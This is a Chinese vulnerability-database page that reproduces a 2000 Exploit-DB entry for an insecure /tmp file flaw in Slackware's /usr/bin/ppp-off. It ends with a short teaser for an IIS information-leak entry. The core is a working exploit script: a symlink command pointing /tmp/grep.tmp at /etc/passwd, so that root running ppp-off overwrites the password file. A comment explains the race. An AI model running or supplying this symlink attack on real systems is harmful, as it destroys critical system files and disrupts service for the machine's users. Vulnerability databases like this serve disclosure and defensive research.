Slackware Linux – ‘/usr/bin/ppp-off’ Insecure /tmp Call

漏洞ID	1053481	漏洞类型
发布时间	2000-11-17	更新时间	2000-11-17
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/185

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/bin/sh
#
# In SlackWare Linux the script /usr/bin/ppp-off writes the
# output of 'ps x' to /tmp/grep.tmp. Since root is the user
# that runs ppp-off,  a non-privileged  user could create a
# link from /tmp/grep.tmp to any file(ie: /etc/issue), thus
# when root runs the  ppp-off script, the  output of 'ps x'
# would be put in the linked file. 
#                                                   sinfony

ln -s /etc/passwd /tmp/grep.tmp


# milw0rm.com [2000-11-17]

相关推荐: IIS和Site Server Winmsdp.exe示例文件信息泄露漏洞

IIS和Site Server Winmsdp.exe示例文件信息泄露漏洞漏洞ID 1206715 漏洞类型未知发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1451 CNNVD-ID CNNVD-1999…